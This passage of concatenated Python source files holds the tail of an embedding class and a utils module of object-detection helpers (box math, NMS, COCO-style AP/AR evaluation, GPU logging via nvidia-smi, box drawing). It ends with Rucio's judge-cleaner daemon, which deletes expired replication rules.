self.global_emb.state_sum.index_add_(0, cpu_idx, cpu_sum)
std = self.global_emb.state_sum[cpu_idx]
if gpu_id >= 0:
std = std.cuda(gpu_id)
std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
tmp = (-clr * cpu_grad / std_values)
tmp = tmp.cpu()
self.global_emb.emb.index_add_(0, cpu_idx, tmp)
self.state_sum.index_add_(0, grad_indices, grad_sum)
std = self.state_sum[grad_indices] # _sparse_mask
if gpu_id >= 0:
std = std.cuda(gpu_id)
std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
tmp = (-clr * grad_values / std_values)
if tmp.device != device:
tmp = tmp.to(device)
# TODO(zhengda) the overhead is here.
self.emb.index_add_(0, grad_indices, tmp)
self.trace = []
def create_async_update(self):
"""Set up the async update subprocess.
"""
self.async_q = Queue(1)
self.async_p = mp.Process(target=async_update, args=(self.args, self, self.async_q))
self.async_p.start()
def finish_async_update(self):
"""Notify the async update subprocess to quit.
"""
self.async_q.put((None, None, None))
self.async_p.join()
def curr_emb(self):
"""Return embeddings in trace.
"""
data = [data for _, data in self.trace]
return th.cat(data, 0)
def save(self, path, name):
"""Save embeddings.
Parameters
----------
path : str
Directory to save the embedding.
name : str
Embedding name.
"""
file_name = os.path.join(path, name+'.npy')
np.save(file_name, self.emb.cpu().detach().numpy())
def load(self, path, name):
"""Load embeddings.
Parameters
----------
path : str
Directory to load the embedding.
name : str
Embedding name.
"""
file_name = os.path.join(path, name+'.npy')
self.emb = th.Tensor(np.load(file_name))
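# A minimal usage sketch of ExternalEmbedding (the `args` object with `.lr` and
# `.gpu` fields, the sizes, and the toy loss are assumptions for illustration):
#
#   emb = ExternalEmbedding(args, num=1000, dim=200, device=th.device('cpu'))
#   emb.init(emb_init=1.0)
#   vecs = emb(th.tensor([1, 2, 3]), trace=True)   # records (idx, data) in emb.trace
#   loss = vecs.sum()
#   loss.backward()
#   emb.update()                                   # sparse Adagrad-style step, clears the trace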
|
utils.py
|
# coding=utf-8
"""Some util functions/classes."""
import random
import itertools
import math
import threading
import sys
import time
import os
import psutil
import operator
import cv2
# import commands
if sys.version_info > (3, 0):
import subprocess as commands
else:
import commands
from operator import mul
# from itertools import izip_longest
import itertools
from collections import defaultdict
import numpy as np
import pycocotools.mask as cocomask
# pycocotools can trigger
# 'Unable to init server: Could not connect: Connection refused'
# under python 3, so force a non-interactive matplotlib backend
import matplotlib
matplotlib.use("Agg")
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
def tlwh_intersection(tlwh1, tlwh2):
# compute intersection area / area of tlwh2
box1_left, box1_top, box1_w, box1_h = tlwh1
box2_left, box2_top, box2_w, box2_h = tlwh2
box1_bottom, box1_right = box1_left + box1_w, box1_top + box1_h
box2_bottom, box2_right = box2_left + box2_w, box2_top + box2_h
tlwh2_area = box2_w * box2_h
tlbr1 = [box1_left, box1_top, box1_bottom, box1_right]
tlbr2 = [box2_left, box2_top, box2_bottom, box2_right]
xx1 = np.maximum(tlbr1[0], tlbr2[0])
yy1 = np.maximum(tlbr1[1], tlbr2[1])
xx2 = np.minimum(tlbr1[2], tlbr2[2])
yy2 = np.minimum(tlbr1[3], tlbr2[3])
w = np.maximum(0, xx2 - xx1)
h = np.maximum(0, yy2 - yy1)
return (w * h) / tlwh2_area
def expand_tlwh(tlwh, w_p=0.1, h_p=0.1):
    # expand tlwh box by a width portion (w_p, default 0.1) and a height portion (h_p)
left, top, width, height = tlwh
expanded_width = width * (1.0 + w_p)
expanded_height = height * (1.0 + h_p)
new_left = left - width * w_p * 0.5
new_top = top - height * h_p * 0.5
return [new_left, new_top, expanded_width, expanded_height]
def parse_meva_clip_name(clip_name):
# assuming no appendix
date, start_time, end_time, location, camera = clip_name.split(".")
return date, end_time.split("-")[0]
class Summary:
def __init__(self):
self.lines = []
def add(self, string, print_it=True):
if print_it:
print(string)
self.lines.append(string)
def writeTo(self, path):
with open(path, "w") as f:
f.writelines("%s" % ("\n".join(self.lines)))
def grouper(l, n, fillvalue=None):
    # given a list and n (batch_size), divide the list into n-sized chunks
    # the last chunk is padded with None
args = [iter(l)] * n
if sys.version_info > (3, 0):
out = itertools.zip_longest(*args, fillvalue=None)
else:
out = itertools.izip_longest(*args, fillvalue=None)
out = list(out)
return out
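# For example (illustrative): grouper([1, 2, 3, 4, 5], 2) -> [(1, 2), (3, 4), (5, None)]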
# simple FIFO class for moving average computation
class FIFO_ME:
def __init__(self, N):
self.N = N
self.lst = []
assert N > 0
def put(self, val):
if val is None:
return None
self.lst.append(val)
if len(self.lst) > self.N:
self.lst.pop(0)
return 1
def me(self):
if not self.lst:
return None
return np.mean(self.lst)
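# For example (illustrative): with FIFO_ME(3), putting 1, 2, 3, 4 keeps [2, 3, 4],
# so me() returns 3.0 (the moving average over the last N values).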
# return the gpu utilization at the moment. float between 0~1.0
# tested for nvidia 384.90
# gpuid_range is a tuple of (gpu_startid, gpu_num)
def parse_nvidia_smi(gpuid_range):
nvi_out = commands.getoutput("nvidia-smi")
# ['| 0% 41C P8 9W / 180W | 26MiB / 8117MiB | 0% Default |']
gpu_info_blocks = get_gpu_info_block(nvi_out)[
gpuid_range[0] : (gpuid_range[0] + gpuid_range[1])
]
    # num_gpu = len(gpu_info_blocks)  # the ones we care about
    # the following are lists with one entry per gpu
temps = [
float(info_block.strip().strip("|").split()[1].strip("C"))
for info_block in gpu_info_blocks
]
utilizations = [
float(info_block.strip().strip("|").split()[-2].strip("%")) / 100.0
for info_block in gpu_info_blocks
]
# in mb
memories = [
float(info_block.strip().strip("|").split()[-6].strip(" MiB"))
for info_block in gpu_info_blocks
]
return temps, utilizations, memories
class PerformanceLogger(object):
def __init__(self, gpu_ids, interval=10.0):
self.gpu_ids = gpu_ids
self.interval = interval # in seconds
self.logs = {
"cpu_utilization": [],
"gpu_utilization": [],
"gpu_temperature": [],
"gpu_memory": [],
"ram_used": [],
"timing": [],
}
self.mb = 1024 * 1024.0
        # cannot use a Process here since we need shared memory for the logs
self.performance_check_thread = threading.Thread(target=self.log_util_fn)
self.performance_check_thread.daemon = True
def log_util_fn(self):
while True:
time.sleep(self.interval)
self.logs["timing"].append(time.time())
gpu_temps, gpu_utils, gpu_mems = parse_nvidia_smi(self.gpu_ids)
# https://psutil.readthedocs.io/en/latest/#psutil.cpu_percent
cpu_percent = psutil.cpu_percent(interval=0.1, percpu=False) # already %
ram_used = psutil.virtual_memory().used / self.mb # in MB
# save the average of this instant
self.logs["gpu_utilization"].append(np.mean(gpu_utils) * 100.0)
self.logs["gpu_temperature"].append(np.mean(gpu_temps))
self.logs["gpu_memory"].append(np.mean(gpu_mems))
self.logs["cpu_utilization"].append(cpu_percent)
self.logs["ram_used"].append(ram_used)
def start(self):
self.performance_check_thread.start()
def end(self):
self.performance_check_thread.join(0)
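# A minimal usage sketch of PerformanceLogger (the gpu id range and interval are
# assumptions for illustration):
#   perf = PerformanceLogger(gpu_ids=(0, 1), interval=5.0)
#   perf.start()
#   ...  # run the workload
#   perf.end()
#   print(np.mean(perf.logs["gpu_utilization"]))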
def get_gpu_info_block(nvi_out):
nvi_out = nvi_out.split("\n")
start_idx = -1
end_idx = -1
for i, line in enumerate(nvi_out):
if line.startswith("|====="):
start_idx = i + 1
break
for i, line in enumerate(nvi_out):
if line.startswith(" "):
end_idx = i
break
assert (start_idx >= 0) and (end_idx >= 0), nvi_out
    # each gpu occupies a block of lines; the stats line we want is at i + 1
gpu_info_blocks = []
for i in range(start_idx, end_idx, 3):
# nvi_out[i]:"| 0 GeForce GTX TIT... Off | 00000000:01:00.0 Off |
# N/A |"
# nvi_out[i+1]: "| 47% 81C P2 87W / 250W | 10547MiB / 12205MiB |
# 0% Default |"
gpu_info_blocks.append(nvi_out[i + 1])
return gpu_info_blocks
def nms_wrapper(final_boxes, final_probs, config):
# in this mode,
# final_boxes would be [num_class-1, num_prop, 4]
# final_probs would be [num_class-1, num_prop]
# 1. make one dets matrix
# [num_class-1, num_prop, 5]
dets = np.concatenate([final_boxes, np.expand_dims(final_probs, axis=-1)], axis=-1)
final_boxes, final_probs, final_labels = [], [], []
for c in range(dets.shape[0]): # 0- num_class-1
this_dets = dets[c]
# hard limit of confident score
select_ids = this_dets[:, -1] > config.result_score_thres
this_dets = this_dets[select_ids, :]
classid = c + 1 # first one is BG
# 2. nms, get [K, 5]
# if config.use_soft_nms:
# keep = soft_nms(this_dets)
# else:
keep = nms(this_dets, config.fastrcnn_nms_iou_thres)
this_dets = this_dets[keep, :]
# sort the output and keep only k for each class
boxes = this_dets[:, :4] # [K,4]
probs = this_dets[:, 4] # [K]
final_boxes.extend(boxes)
final_probs.extend(probs)
final_labels.extend([classid for i in range(len(probs))])
# they could be empty, for empty scenes when filtered using result_score_thres
if not final_boxes:
return [], [], []
final_boxes_all = np.array(final_boxes, dtype="float")
final_probs_all = np.array(final_probs)
final_labels_all = np.array(final_labels)
# keep max result across all class
ranks = np.argsort(final_probs)[::-1]
final_boxes = final_boxes_all[ranks, :][: config.result_per_im]
final_probs = final_probs_all[ranks][: config.result_per_im]
final_labels = final_labels_all[ranks][: config.result_per_im]
return final_boxes, final_labels, final_probs
class Dataset:
# data should be
"""
data = {"imgs":[],"ids":[],"gt":[]}
"""
def __init__(self, data, add_gt=False, valid_idxs=None):
self.data = data
self.add_gt = add_gt
self.valid_idxs = (
range(len(next(iter(self.data.values()))))
if valid_idxs is None
else valid_idxs
)
self.num_examples = len(self.valid_idxs) # get one var "x" and get the len
def get_by_idxs(self, idxs):
out = defaultdict(list) # so the initial value is a list
for key, val in self.data.items():
out[key].extend(val[idx] for idx in idxs) # extend with one whole list
return out
    # return num_batches batches, each of size batch_size
    # if cap, make sure the total samples used <= dataset size
def get_batches(self, batch_size, num_batches, shuffle=True, cap=False):
num_batches_per_epoch = int(math.ceil(self.num_examples / float(batch_size)))
if cap and (num_batches > num_batches_per_epoch):
num_batches = num_batches_per_epoch
# this may be zero
num_epochs = int(math.ceil(num_batches / float(num_batches_per_epoch)))
        # shuffle
if shuffle:
# this is the list of shuffled all idxs
random_idxs = random.sample(self.valid_idxs, len(self.valid_idxs))
# all batch idxs for one epoch
random_grouped = lambda: list(grouper(random_idxs, batch_size))
grouped = random_grouped
else:
raw_grouped = lambda: list(grouper(self.valid_idxs, batch_size))
grouped = raw_grouped
# all batches idxs from multiple epochs
batch_idxs_iter = itertools.chain.from_iterable(
grouped() for _ in range(num_epochs)
)
        # so the ordering across all epochs is fixed here
for _ in range(num_batches):
            # in the final batch, the None padding is not included
batch_idxs = tuple(i for i in next(batch_idxs_iter) if i is not None)
# a dict of {"x":[],"y":[],"ids":[]...}
# batch_idxs could be str?
# batch_data = self.get_by_idxs(batch_idxs)
# yield batch_idxs,Dataset(batch_data) # make a new Dataset object
# will continue next time it is called, i.e., in the next loop
            # modified for the multi-gpu setting: each image gets its own Dataset object
batch_datas = [self.get_by_idxs([idx]) for idx in batch_idxs]
            # print(batch_idxs)
            # print(batch_datas)
yield batch_idxs, [Dataset(batch_data) for batch_data in batch_datas]
# helper function for eval
def gather_dt(
boxes,
probs,
labels,
eval_target,
targetid2class,
tococo=False,
coco_class_names=None,
):
target_dt_boxes = {one: [] for one in eval_target.keys()}
for box, prob, label in zip(boxes, probs, labels):
# coco box
box[2] -= box[0]
box[3] -= box[1]
assert label > 0
if tococo:
cat_name = coco_class_names[label]
else:
# diva class trained from scratch
cat_name = targetid2class[label]
target_class = None
if tococo:
for t in eval_target:
if cat_name in eval_target[t]:
target_class = t
else:
if cat_name in eval_target:
target_class = cat_name
if target_class is None: # box from other class of mscoco/diva
continue
prob = float(round(prob, 4))
# box = list(map(lambda x:float(round(x, 2)),box))
box = [float(round(x, 2)) for x in box]
target_dt_boxes[target_class].append((box, prob))
return target_dt_boxes
def aggregate_eval(e, maxDet=100):
aps = {}
ars = {}
for catId in e:
e_c = e[catId]
# put all detection scores from all image together
dscores = np.concatenate([e_c[imageid]["dscores"][:maxDet] for imageid in e_c])
# sort
inds = np.argsort(-dscores, kind="mergesort")
# dscores_sorted = dscores[inds]
# put all detection annotation together based on the score sorting
dm = np.concatenate([e_c[imageid]["dm"][:maxDet] for imageid in e_c])[inds]
num_gt = np.sum([e_c[imageid]["gt_num"] for imageid in e_c])
# here the average precision should also put the unmatched ground truth
# as detection box with lowest score
# aps[catId] = computeAP(dm)
aps[catId] = computeAP_v2(dm, num_gt)
ars[catId] = computeAR_2(dm, num_gt)
return aps, ars
def weighted_average(aps, ars, eval_target_weight=None):
if eval_target_weight is not None:
average_ap = sum([aps[class_] * eval_target_weight[class_] for class_ in aps])
average_ar = sum([ars[class_] * eval_target_weight[class_] for class_ in ars])
else:
average_ap = sum(aps.values()) / float(len(aps))
average_ar = sum(ars.values()) / float(len(ars))
return average_ap, average_ar
def gather_gt(anno_boxes, anno_labels, eval_target, targetid2class):
gt_boxes = {one: [] for one in eval_target.keys()}
for box, label in zip(anno_boxes, anno_labels):
label = targetid2class[label]
if label in eval_target:
# gt_box = list(map(lambda x:float(round(x,1)),box))
gt_box = [float(round(x, 1)) for x in box]
# gt_box is in (x1,y1,x2,y2)
# convert to coco box
gt_box[2] -= gt_box[0]
gt_box[3] -= gt_box[1]
gt_boxes[label].append(gt_box)
return gt_boxes
# change e in place
def match_dt_gt(e, imgid, target_dt_boxes, gt_boxes, eval_target):
for target_class in eval_target.keys():
# if len(gt_boxes[target_class]) == 0:
# continue
target_dt_boxes[target_class].sort(key=operator.itemgetter(1), reverse=True)
d = [box for box, prob in target_dt_boxes[target_class]]
dscores = [prob for box, prob in target_dt_boxes[target_class]]
g = gt_boxes[target_class]
# len(D), len(G)
dm, gm = match_detection(
d, g, cocomask.iou(d, g, [0 for _ in range(len(g))]), iou_thres=0.5
)
e[target_class][imgid] = {"dscores": dscores, "dm": dm, "gt_num": len(g)}
# for activity boxes
def gather_act_singles(actsingleboxes, actsinglelabels, topk):
single_act_boxes = []
single_act_labels = []
single_act_probs = []
# [K,num_act_class]
# descending order
sorted_prob_single = np.argsort(actsinglelabels, axis=-1)[:, ::-1]
BG_ids = sorted_prob_single[:, 0] == 0 # [K] of bool
for j in range(len(actsinglelabels)):
if BG_ids[j]:
continue
labelIds = [sorted_prob_single[j, k] for k in range(topk)]
# ignore BG class # or ignore everything after BG class?
this_labels = [lid for lid in labelIds if lid != 0]
this_probs = [actsinglelabels[j, lid] for lid in this_labels]
this_boxes = [actsingleboxes[j] for _ in range(len(this_labels))]
single_act_probs.extend(this_probs)
single_act_labels.extend(this_labels)
single_act_boxes.extend(this_boxes)
return single_act_boxes, single_act_labels, single_act_probs
def match_detection(d, g, ious, iou_thres=0.5):
D = len(d)
G = len(g)
# < 0 to note it is not matched, once matched will be the index of the d
gtm = -np.ones((G)) # whether a gt box is matched
dtm = -np.ones((D))
# for each detection bounding box (ranked), will get the best IoU
# matched ground truth box
for didx, _ in enumerate(d):
iou = iou_thres # the matched iou
m = -1 # used to remember the matched gidx
for gidx, _ in enumerate(g):
# if this gt box is matched
if gtm[gidx] >= 0:
continue
# the di,gi pair doesn"t have the required iou
# or not better than before
if ious[didx, gidx] < iou:
continue
# got one
iou = ious[didx, gidx]
m = gidx
if m == -1:
continue
gtm[m] = didx
dtm[didx] = m
return dtm, gtm
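# For example (illustrative): with two detections and one ground truth box,
# ious = np.array([[0.6], [0.8]]) and iou_thres=0.5, the higher-ranked detection 0
# greedily claims gt 0, so match_detection returns dtm = [0, -1], gtm = [0].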
def evalcoco(res, annofile, add_mask=False):
coco = COCO(annofile)
cocoDt = coco.loadRes(res)
cocoEval = COCOeval(coco, cocoDt, "bbox")
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
if add_mask:
cocoEval = COCOeval(coco, cocoDt, "segm")
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
# given a number of seconds, convert to H:M:S
def sec2time(secs):
    # return strftime("%H:%M:%S", time.gmtime(secs))  # doesn't support milliseconds
m, s = divmod(secs, 60)
# print(m,s
h, m = divmod(m, 60)
if s >= 10.0:
return "%02d:%02d:%.3f" % (h, m, s)
else:
return "%02d:%02d:0%.3f" % (h, m, s)
def get_op_tensor_name(name):
"""
Will automatically determine if ``name`` is a tensor name (ends with ":x")
or a op name.
If it is an op name, the corresponding tensor name is assumed to be
``op_name + ":0"``.
Args:
name(str): name of an op or a tensor
Returns:
tuple: (op_name, tensor_name)
"""
if len(name) >= 3 and name[-2] == ":":
return name[:-2], name
else:
return name, name + ":0"
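# For example (illustrative):
#   get_op_tensor_name("tower0/conv")   -> ("tower0/conv", "tower0/conv:0")
#   get_op_tensor_name("tower0/conv:0") -> ("tower0/conv", "tower0/conv:0")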
# from tensorpack
def draw_boxes(im, boxes, labels=None, colors=None):
"""
Args:
im (np.ndarray): a BGR image in range [0,255]. It will not be modified.
boxes (np.ndarray or list[BoxBase]): If an ndarray,
must be of shape Nx4 where the second dimension is [x1, y1, x2, y2].
labels: (list[str] or None)
color: a 3-tuple (in range [0, 255]). By default will choose automatically.
Returns:
np.ndarray: a new image.
"""
FONT = cv2.FONT_HERSHEY_SIMPLEX
FONT_SCALE = 0.4
if isinstance(boxes, list):
arr = np.zeros((len(boxes), 4), dtype="int32")
for idx, b in enumerate(boxes):
assert isinstance(b, BoxBase), b
arr[idx, :] = [int(b.x1), int(b.y1), int(b.x2), int(b.y2)]
boxes = arr
else:
boxes = boxes.astype("int32")
if labels is not None:
assert len(labels) == len(boxes), "{} != {}".format(len(labels), len(boxes))
areas = (boxes[:, 2] - boxes[:, 0] + 1) * (boxes[:, 3] - boxes[:, 1] + 1)
sorted_inds = np.argsort(-areas) # draw large ones first
assert areas.min() > 0, areas.min()
# allow equal, because we are not very strict about rounding error here
assert (
boxes[:, 0].min() >= 0
and boxes[:, 1].min() >= 0
and boxes[:, 2].max() <= im.shape[1]
and boxes[:, 3].max() <= im.shape[0]
), "Image shape: {}\n Boxes:\n{}".format(str(im.shape), str(boxes))
im = im.copy()
COLOR_DIFF_WEIGHT = np.asarray((3, 4, 2), dtype="int32")
COLOR_CANDIDATES = PALETTE_RGB[:, ::-1]
if im.ndim == 2 or (im.ndim == 3 and im.shape[2] == 1):
im = cv2.cvtColor(im, cv2.COLOR_GRAY2BGR)
for i in sorted_inds:
box = boxes[i, :]
best_color = colors[i] if colors is not None else (255, 0, 0)
if labels is not None:
label = labels[i]
# find the best placement for the text
((linew, lineh), _) = cv2.getTextSize(label, FONT, FONT_SCALE, 1)
bottom_left = [box[0] + 1, box[1] - 0.3 * lineh]
top_left = [box[0] + 1, box[1] - 1.3 * lineh]
if top_left[1] < 0: # out of image
top_left[1] = box[3] - 1.3 * lineh
bottom_left[1] = box[3] - 0.3 * lineh
textbox = IntBox(
int(top_left[0]),
int(top_left[1]),
int(top_left[0] + linew),
int(top_left[1] + lineh),
)
textbox.clip_by_shape(im.shape[:2])
cv2.putText(
im, label, (textbox.x1, textbox.y2), FONT, FONT_SCALE, color=best_color
) # , lineType=cv2.LINE_AA)
cv2.rectangle(
im, (box[0], box[1]), (box[2], box[3]), color=best_color, thickness=1
)
return im
# a list of floats; a value < 0 means false positive, otherwise true positive
# assume the list is sorted by detection score
def computeAP(lists):
    # number of relevant (true positive) detections so far
rels = 0
    # current rank
rank = 0
    # AP score
score = 0.0
for one in lists:
rank += 1
        # it is relevant (a true positive)
if one >= 0:
rels += 1
score += rels / float(rank)
if rels != 0:
score /= float(rels)
return score
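# For example (illustrative): computeAP([1, -1, 1]) has true positives at ranks
# 1 and 3, giving (1/1 + 2/3) / 2 ≈ 0.833.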
def computeAP_v2(lists, total_gt):
    # number of relevant (true positive) detections so far
rels = 0
    # current rank
rank = 0
    # AP score
score = 0.0
for one in lists:
rank += 1
        # it is relevant (a true positive)
if one >= 0:
rels += 1
score += rels / float(rank)
if total_gt != 0:
score /= float(total_gt)
return score
# given a fixed number (recall_k) of detections,
# assume d is sorted; d[i] < 0 means false positive,
# otherwise d[i] == gidx of the matched ground truth
def computeAR(d, g, recall_k):
TrueDetections = len([one for one in d[:recall_k] if one >= 0])
num_gt = len(g)
if len(g) > recall_k:
num_gt = recall_k
if not g:
return 1.0
else:
return TrueDetections / float(num_gt)
def computeAR_2(d, num_gt):
true_positives = len([one for one in d if one >= 0])
if num_gt == 0:
return 1.0
else:
return true_positives / float(num_gt)
PALETTE_HEX = [
"#000000",
"#FFFF00",
"#1CE6FF",
"#FF34FF",
"#FF4A46",
"#008941",
"#006FA6",
"#FFDBE5",
"#7A4900",
"#0000A6",
"#63FFAC",
"#B79762",
"#004D43",
"#8FB0FF",
"#5A0007",
"#809693",
"#FEFFE6",
"#1B4400",
"#4FC601",
"#3B5DFF",
"#4A3B53",
"#61615A",
"#BA0900",
"#6B7900",
"#00C2A0",
"#FFAA92",
"#FF90C9",
"#B903AA",
"#DDEFFF",
"#000035",
"#7B4F4B",
"#A1C299",
"#300018",
"#0AA6D8",
"#013349",
"#372101",
"#FFB500",
"#C2FFED",
"#A079BF",
"#CC0744",
"#C0B9B2",
"#C2FF99",
"#00489C",
"#6F0062",
"#0CBD66",
"#EEC3FF",
"#456D75",
"#B77B68",
"#7A87A1",
"#885578",
"#FAD09F",
"#FF8A9A",
"#D157A0",
"#BEC459",
"#456648",
"#0086ED",
"#34362D",
"#B4A8BD",
"#00A6AA",
"#452C2C",
"#636375",
"#A3C8C9",
"#FF913F",
"#575329",
"#00FECF",
"#B05B6F",
"#8CD0FF",
"#3B9700",
"#04F757",
"#C8A1A1",
"#7900D7",
"#A77500",
"#6367A9",
"#A05837",
"#6B002C",
"#772600",
"#D790FF",
"#549E79",
"#FFF69F",
"#201625",
"#72418F",
"#BC23FF",
"#99ADC0",
"#3A2465",
"#5B4534",
"#FDE8DC",
"#404E55",
"#0089A3",
"#CB7E98",
"#A4E804",
"#324E72",
"#83AB58",
"#001C1E",
"#D1F7CE",
"#004B28",
"#C8D0F6",
"#A3A489",
"#806C66",
"#BF5650",
"#E83000",
"#66796D",
"#DA007C",
"#FF1A59",
"#8ADBB4",
"#1E0200",
"#C895C5",
"#320033",
"#FF6832",
"#66E1D3",
"#CFCDAC",
"#D0AC94",
"#A30059",
"#997D87",
"#FF2F80",
"#D16100",
"#00846F",
"#001E09",
"#788D66",
"#886F4C",
"#938A81",
"#1E6E00",
"#9B9700",
"#922329",
"#6A3A4C",
"#222800",
"#5B4E51",
"#7ED379",
"#012C58",
]
def _parse_hex_color(s):
r = int(s[1:3], 16)
g = int(s[3:5], 16)
b = int(s[5:7], 16)
return (r, g, b)
PALETTE_RGB = np.asarray(list(map(_parse_hex_color, PALETTE_HEX)), dtype="int32")
# convert from COCO format (x,y,w,h) to (x1,y1,x2,y2)
def box_wh_to_x1x2(box):
return [box[0], box[1], box[0] + box[2], box[1] + box[3]]
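# For example (illustrative): box_wh_to_x1x2([10, 20, 30, 40]) -> [10, 20, 40, 60]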
class BoxBase(object):
__slots__ = ["x1", "y1", "x2", "y2"]
def __init__(self, x1, y1, x2, y2):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
def copy(self):
new = type(self)()
for i in self.__slots__:
setattr(new, i, getattr(self, i))
return new
def __str__(self):
return "{}(x1={}, y1={}, x2={}, y2={})".format(
type(self).__name__, self.x1, self.y1, self.x2, self.y2
)
__repr__ = __str__
def area(self):
return self.w * self.h
def is_box(self):
return self.w > 0 and self.h > 0
class IntBox(BoxBase):
def __init__(self, x1, y1, x2, y2):
for k in [x1, y1, x2, y2]:
assert isinstance(k, int)
super(IntBox, self).__init__(x1, y1, x2, y2)
@property
def w(self):
return self.x2 - self.x1 + 1
@property
def h(self):
return self.y2 - self.y1 + 1
def is_valid_box(self, shape):
"""
Check that this rect is a valid bounding box within this shape.
Args:
shape: int [h, w] or None.
Returns:
bool
"""
if min(self.x1, self.y1) < 0:
return False
if min(self.w, self.h) <= 0:
return False
if self.x2 >= shape[1]:
return False
if self.y2 >= shape[0]:
return False
return True
def clip_by_shape(self, shape):
"""
Clip xs and ys to be valid coordinates inside shape
Args:
shape: int [h, w] or None.
"""
self.x1 = np.clip(self.x1, 0, shape[1] - 1)
self.x2 = np.clip(self.x2, 0, shape[1] - 1)
self.y1 = np.clip(self.y1, 0, shape[0] - 1)
self.y2 = np.clip(self.y2, 0, shape[0] - 1)
def roi(self, img):
assert self.is_valid_box(img.shape[:2]), "{} vs {}".format(self, img.shape[:2])
return img[self.y1 : self.y2 + 1, self.x1 : self.x2 + 1]
|
cleaner.py
|
# Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2016
# - Mario Lassnig <mario.lassnig@cern.ch>, 2013-2015
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013
# - Vincent Garonne <vgaronne@gmail.com>, 2014-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019-2020
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
#
# PY3K COMPATIBLE
"""
Judge-Cleaner is a daemon to clean expired replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from re import match
from random import randint
from sqlalchemy.exc import DatabaseError
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException, UnsupportedOperation, RuleNotFound
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import delete_rule, get_expired_rules
from rucio.core.monitor import record_counter
from rucio.db.sqla.util import get_db_time
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_cleaner(once=False):
"""
Main loop to check for expired replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-cleaners have the correct worker number on the next try
executable = 'judge-cleaner'
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
rules = get_expired_rules(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'],
limit=200,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_cleaner[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'], time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_cleaner[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'], str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule in rules:
rule_id = rule[0]
rule_expression = rule[1]
logging.info('rule_cleaner[%s/%s]: Deleting rule %s with expression %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id, rule_expression))
if graceful_stop.is_set():
break
try:
start = time.time()
delete_rule(rule_id=rule_id, nowait=True)
logging.debug('rule_cleaner[%s/%s]: deletion of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id, time.time() - start))
except (DatabaseException, DatabaseError, UnsupportedOperation) as e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
record_counter('rule.judge.exceptions.LocksDetected')
logging.warning('rule_cleaner[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RuleNotFound as e:
pass
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
    Starts up the Judge-Cleaner threads.
"""
client_time, db_time = datetime.utcnow(), get_db_time()
max_offset = timedelta(hours=1, seconds=10)
if type(db_time) is datetime:
if db_time - client_time > max_offset or client_time - db_time > max_offset:
logging.critical('Offset between client and db time too big. Stopping Cleaner')
return
executable = 'judge-cleaner'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
rule_cleaner(once)
else:
logging.info('Cleaner starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_cleaner, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
